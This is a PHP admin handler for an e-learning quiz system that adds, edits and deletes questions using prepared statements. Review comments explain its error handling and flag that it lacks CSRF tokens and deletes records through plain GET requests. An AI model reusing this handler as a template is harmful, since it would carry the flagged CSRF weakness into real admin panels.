
Current File : E:/Inetpub/www/news/elearning/admin//question_auth.php
<?php

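// Bootstrap include. Presumably this is where $DB, TBL_QUESTIONS and the
// helpers used below (is_admin_logged_in, redirect, generate_admin_link,
// safe_input) come from -- none of them are defined in this file.
require '../configs/app_top.php';

// Every action below modifies question data, so reject any request that does
// not come from a logged-in admin before reading the request parameters.
if (!is_admin_logged_in()) {
  redirect(generate_admin_link("login"));
  exit;
}

// NOTE(review): nothing in this handler verifies an anti-CSRF token, and the
// delete action is triggered by a plain GET request. An admin's browser can
// therefore be made to add, change or delete questions by a third-party page.
// Recommended follow-up: require a per-session token on all three modes and
// accept delete only via POST (this needs matching changes in the forms/links
// that call this script, which are not visible here).

// NOTE(review): safe_input() is defined elsewhere; what it filters is not
// visible here. SQL safety below does not depend on it, because every value
// is passed as a bound parameter of a prepared statement.

if (isset($_POST['mode']) && $_POST['mode'] === 'add_new') {
  // ---- Create a new question under subject `id` ----
  $redirectTo = "questions";

  // isset() guards avoid "undefined index" notices when a field is missing;
  // a missing field is still handed to safe_input() as null, as before.
  $sub_id = safe_input(isset($_POST['id']) ? $_POST['id'] : null);
  $qb_question = safe_input(isset($_POST['qb_question']) ? $_POST['qb_question'] : null);
  $opt1 = safe_input(isset($_POST['opt1']) ? $_POST['opt1'] : null);
  $opt2 = safe_input(isset($_POST['opt2']) ? $_POST['opt2'] : null);
  $opt3 = safe_input(isset($_POST['opt3']) ? $_POST['opt3'] : null);
  $opt4 = safe_input(isset($_POST['opt4']) ? $_POST['opt4'] : null);
  $ans = safe_input(isset($_POST['ans']) ? $_POST['ans'] : null);
  $sort_order = safe_input(isset($_POST['sort_order']) ? $_POST['sort_order'] : null);

  if ($qb_question == '' || intval($sub_id) == 0 || $opt1 == '' || $opt2 == '' || $opt3 == '' || $opt4 == '' || $ans == '') {
    $_SESSION["errorMsg"] = "Please provide the required fields";
    $_SESSION["errorType"] = "danger";
  } else {

    // Stays 0 when the INSERT throws, so the failure branch below is taken
    // without reading an undefined variable.
    $retval = 0;

    try {

      $sql = "INSERT INTO " . TBL_QUESTIONS . " "
              . "( `qb_subject_id`, `qb_question`, `qb_option1`, `qb_option2`, `qb_option3`, `qb_option4`, `qb_answer`, `sort_order` ) VALUES "
              . "(:sub_id, :qtn, :opt1, :opt2, :opt3, :opt4,:ans, :so)";
      $stmt = $DB->prepare($sql);

      $stmt->bindValue(":sub_id", $sub_id);
      $stmt->bindValue(":qtn", $qb_question);
      $stmt->bindValue(":opt1", $opt1);
      $stmt->bindValue(":opt2", $opt2);
      $stmt->bindValue(":opt3", $opt3);
      $stmt->bindValue(":opt4", $opt4);
      $stmt->bindValue(":ans", $ans);
      $stmt->bindValue(":so", $sort_order);
      $stmt->execute();
      $retval = $stmt->rowCount();
    } catch (Exception $ex) {
      // The original handler built a message from $ct_name, which is never
      // defined in this file, and that message was then overwritten by the
      // failure branch below anyway. Keep the details in the server log only.
      error_log("question_auth add_new failed: " . $ex->getMessage());
    }
    if ($retval > 0) {

      // Thai UI text: confirmation that the question was added.
      $_SESSION["errorMsg"] = "เพิ่มข้อสอบเสร็จเรียนร้อยแล้ว.";
      $_SESSION["errorType"] = "success";

    } else {
      $_SESSION["errorMsg"] = "Failed to add question. Try Again";
      $_SESSION["errorType"] = "danger";
    }
  }

  // Ids are validated as integers above, so emit them as integers: request
  // data can then never add extra parameters or characters to the redirect.
  redirect(generate_admin_link($redirectTo, "id=" . intval($sub_id)));
  exit;
} else if (isset($_POST['mode']) && $_POST['mode'] === 'update') {
  // ---- Update an existing question identified by `qid` ----
  $redirectTo = "questions";

  $qid = safe_input(isset($_POST['qid']) ? $_POST['qid'] : null);
  $id = safe_input(isset($_POST['id']) ? $_POST['id'] : null);
  $qb_question = safe_input(isset($_POST['qb_question']) ? $_POST['qb_question'] : null);
  $opt1 = safe_input(isset($_POST['opt1']) ? $_POST['opt1'] : null);
  $opt2 = safe_input(isset($_POST['opt2']) ? $_POST['opt2'] : null);
  $opt3 = safe_input(isset($_POST['opt3']) ? $_POST['opt3'] : null);
  $opt4 = safe_input(isset($_POST['opt4']) ? $_POST['opt4'] : null);
  $ans = safe_input(isset($_POST['ans']) ? $_POST['ans'] : null);
  $sort_order = safe_input(isset($_POST['sort_order']) ? $_POST['sort_order'] : null);

  if ($qb_question == '' || intval($qid) == 0 || $opt1 == '' || $opt2 == '' || $opt3 == '' || $opt4 == '' || $ans == '') {
    $_SESSION["errorMsg"] = "Please provide the required fields";
    $_SESSION["errorType"] = "danger";
  } else {

    // -1 marks "statement did not complete"; it is replaced by the affected
    // row count on success and selects the generic failure message otherwise.
    $retval = -1;

    try {

      $sql = "UPDATE " . TBL_QUESTIONS . "  SET "
              . " `qb_question` = :qtn, `qb_option1` = :opt1, `qb_option2` = :opt2, `qb_option3` = :opt3, `qb_option4` = :opt4,"
              . " `qb_answer` = :ans, `sort_order` = :so "
              . "WHERE `qb_id` = :id ";
      $stmt = $DB->prepare($sql);

      $stmt->bindValue(":qtn", $qb_question);
      $stmt->bindValue(":opt1", $opt1);
      $stmt->bindValue(":opt2", $opt2);
      $stmt->bindValue(":opt3", $opt3);
      $stmt->bindValue(":opt4", $opt4);
      $stmt->bindValue(":ans", $ans);
      $stmt->bindValue(":so", $sort_order);
      $stmt->bindValue(":id", $qid);

      $stmt->execute();
      $retval = $stmt->rowCount();
    } catch (Exception $ex) {
      // Previously the raw exception text was echoed to the browser and the
      // script died. Database error text can reveal table names and query
      // structure, so it is written to the server log and the user gets the
      // generic failure message followed by the normal redirect.
      error_log("question_auth update failed: " . $ex->getMessage());
    }
    if ($retval > 0) {

      // Thai UI text: confirmation that the question was edited.
      $_SESSION["errorMsg"] = "ทำการแก้ไขข้อสอบเรียบร้อยแล้ว.";
      $_SESSION["errorType"] = "success";

    } else if ($retval == 0) {

      // Thai UI text: nothing changed, so the question was not updated.
      $_SESSION["errorMsg"] = "ไม่มีการเปลี่ยนแปลงข้อมูล ระบบไม่สามารถปรับปรุงข้อสอบได้.";
      $_SESSION["errorType"] = "info";

    } else {
      $_SESSION["errorMsg"] = "Failed to update question. Try Again";
      $_SESSION["errorType"] = "danger";
    }
  }

  // Integer casts keep request data out of the redirect target and fragment.
  redirect(generate_admin_link($redirectTo, "id=" . intval($id) . "&qid=" . intval($qid) . "#" . intval($qid)));
  exit;
} else if (isset($_GET['mode']) && $_GET['mode'] === 'delete') {
  // ---- Delete the question identified by `qid` ----
  // NOTE(review): a state-changing GET; see the CSRF note at the top.

  $redirectTo = "questions";
  $qid = safe_input(isset($_GET['qid']) ? $_GET['qid'] : null);
  $id = safe_input(isset($_GET['id']) ? $_GET['id'] : null);

  try {

    $sql = "DELETE FROM " . TBL_QUESTIONS . " WHERE qb_id = :id";
    $stmt = $DB->prepare($sql);
    $stmt->bindValue(":id", $qid);

    $stmt->execute();
    $retval = $stmt->rowCount();

    if ($retval > 0) {
      $_SESSION["errorMsg"] = "Question has been deleted successfully.";
      $_SESSION["errorType"] = "success";
    } else {
      $_SESSION["errorMsg"] = "Cannot delete question. Try Again";
      $_SESSION["errorType"] = "danger";
    }
  } catch (Exception $ex) {
    // Log the database error server-side; show the same generic message the
    // zero-rows case uses instead of the raw exception text.
    error_log("question_auth delete failed: " . $ex->getMessage());
    $_SESSION["errorMsg"] = "Cannot delete question. Try Again";
    $_SESSION["errorType"] = "danger";

  }
  // The original appended the subject id twice ("id=..&id=.."); once suffices.
  redirect(generate_admin_link($redirectTo, "id=" . intval($id)));
  exit;
}

// No recognised mode in the request: send the admin to the "home" link.
redirect(generate_admin_link("home"));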
?>
